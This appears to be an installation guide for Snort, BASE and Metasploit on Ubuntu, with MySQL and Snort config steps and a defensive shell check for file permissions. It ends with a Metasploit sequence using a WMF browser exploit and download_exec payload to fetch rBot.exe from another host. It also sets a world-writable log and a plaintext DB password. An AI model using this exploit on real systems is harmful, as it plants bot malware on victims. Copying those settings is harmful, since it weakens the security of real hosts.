
Installing SNORT & BASE & Metasploit on Ubuntu

1. Install the compiler

apt-get install gcc
apt-get install g++
apt-get install make
apt-get install m4
apt-get install flex
apt-get install bison
apt-get install libc6-dev

 

2. Install libpcap

wget www.tcpdump.org/release/libpcap-1.1.1.tar.gz
root@ubuntu:~/down# tar xzf libpcap-1.1.1.tar.gz
root@ubuntu:~/down# cd libpcap-1.1.1
root@ubuntu:~/down/libpcap-1.1.1# ./configure
root@ubuntu:~/down/libpcap-1.1.1# make && make install

 

3. Install pcre

wget ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.30.tar.gz
root@ubuntu:~/down# tar xzf pcre-8.30.tar.gz
root@ubuntu:~/down# cd pcre-8.30
root@ubuntu:~/down/pcre-8.30# ./configure
root@ubuntu:~/down/pcre-8.30# make && make install

 

4. Configure MySQL (for how to install MySQL, see http://blog.naver.com/leopit/140154575158)

mysql> CREATE DATABASE snort;
mysql> grant CREATE, INSERT, SELECT, UPDATE on snort.* to snort@localhost;
mysql> grant CREATE, INSERT, SELECT, UPDATE on snort.* to snort;
mysql> SET PASSWORD FOR snort@localhost=PASSWORD('snort-db');
mysql> flush privileges;

mysql> show grants for snort@localhost;

+--------------------------------------------------------------------------------------------------+
| Grants for snort@localhost |
+--------------------------------------------------------------------------------------------------+
| GRANT USAGE ON *.* TO 'snort'@'localhost' IDENTIFIED BY PASSWORD '*41D58FEF5E7399DB002ACCB899DDB70B7395E774' | 
| GRANT SELECT, INSERT, UPDATE, CREATE ON `snort`.* TO 'snort'@'localhost' |
+--------------------------------------------------------------------------------------------------+

5. Install snort-mysql

apt-get install snort-mysql 

 

6. Edit the Snort configuration file
vi /etc/snort/database.conf
 

#output database: log, mysql,

output database: alert, mysql, user=snort password=snort-db dbname=snort host=localhost

 

7. Create the Snort DB tables

cd /usr/share/doc/snort-mysql/
zcat create_mysql.gz | mysql -u snort -D snort -psnort-db
rm /etc/snort/db-pending-config

 

8. Change the log file permissions

ls -al /var/log/snort/alert
chown snort /var/log/snort/alert
chmod 666 /var/log/snort/alert

 

9. Restart the daemon

/etc/init.d/snort start
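
A post-install check for steps 6 to 8, added here as an example and not part of the original post: it confirms that database.conf has an active "output database:" line and flags permissions on the config and the alert log that a defender would tighten. The function names db_field, has_mode and audit_snort are hypothetical helpers, and the sample files are constructed in a temporary directory.

```shell
#!/bin/sh
# Print one key (user, password, dbname, host) from the first active
# (uncommented) "output database:" line of a Snort config file.
db_field() {  # usage: db_field <conf-file> <key>
    awk -v key="$2" '
        $1 == "output" && $2 == "database:" {
            for (i = 3; i <= NF; i++)
                if (index($i, key "=") == 1) { print substr($i, length(key) + 2); exit }
        }' "$1"
}

# Succeed if <file> has every permission bit in <mode> set,
# e.g. 0002 = world-writable, 0004 = world-readable.
has_mode() {  # usage: has_mode <file> <octal-mode>
    [ -n "$(find "$1" -prune -perm "-$2" -print)" ]
}

# Print one finding per line; no output means nothing was flagged.
audit_snort() {  # usage: audit_snort <database.conf> <alert-log>
    conf=$1 log=$2
    if [ -z "$(db_field "$conf" dbname)" ]; then
        echo "FAIL no active 'output database:' line in $conf"
    fi
    if [ -n "$(db_field "$conf" password)" ] && has_mode "$conf" 0004; then
        echo "WARN $conf holds the DB password and is world-readable"
    fi
    if has_mode "$log" 0002; then
        echo "WARN $log is world-writable; any local user can alter alerts"
    fi
}

# Constructed sample: the two lines from step 6 and an alert file with
# the mode from step 8, written to a temporary directory.
demo() {
    d=$(mktemp -d) || return 1
    printf '%s\n' '#output database: log, mysql,' \
        'output database: alert, mysql, user=snort password=snort-db dbname=snort host=localhost' \
        > "$d/database.conf"
    : > "$d/alert"
    chmod 644 "$d/database.conf"
    chmod 666 "$d/alert"
    audit_snort "$d/database.conf" "$d/alert"
    rm -rf "$d"
}
demo
```

On an installed host the same check is run as audit_snort /etc/snort/database.conf /var/log/snort/alert.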

 

10. Download and install BASE

Download adodb from downloads.sourceforge.net

cp -r /root/down/adodb5 /var/www/adodb/

 

Download base from base.secureideas.net

cp -r /root/down/base-1.4.5 /var/www/base

 

Open http://localhost/base/setup/index.php in a browser (the setup page)

adodb path: enter /var/www/adodb

Enter the various access details

 

Create base_conf.php

 

Open http://localhost/base/base_main.php for a final check

 

11. Install Metasploit

$ sudo apt-get install subversion ruby rubygems libopenssl-ruby 
$ svn co https://www.metasploit.com/svn/framework3/trunk/
$ mv trunk metasploit

 

Test example:
msf > use windows/browser/ms06_001_wmf_setabortproc

msf > set payload windows/download_exec

msf > set URL http://20.30.40.234/rBot.exe

msf > set SRVHOST 20.30.40.222

msf > set LHOST 20.30.40.222

msf > set URIPATH attack.html

msf > exploit
